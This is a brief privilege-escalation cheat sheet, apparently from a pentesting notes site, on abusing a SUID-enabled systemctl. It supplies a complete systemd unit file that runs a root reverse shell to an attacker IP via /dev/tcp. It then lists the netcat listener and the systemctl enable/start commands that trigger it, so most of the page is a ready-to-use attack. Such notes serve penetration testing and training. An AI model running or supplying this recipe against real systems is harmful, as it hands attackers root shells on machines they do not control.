Systemctl

This Priv Esc is possible if systemctl is misconfigured by having SUID enabled

Create a systemd unit file

Created root.service

[Unit]
Description=rooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<YOUR IP>/1234 0>&1'

[Install]
WantedBy=multi-user.target

If required, transfer file to /tmp using wget and python to transfer file

Configure systemctl with custom sevice and start the service

Configure a netcat listener before starting service: nc -nlvp 1234

$ /bin/systemctl enable /tmp/root.service
$ /bin/systemctl start root

References

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

PreviousPath Variable ManipulationNextAOT

Last updated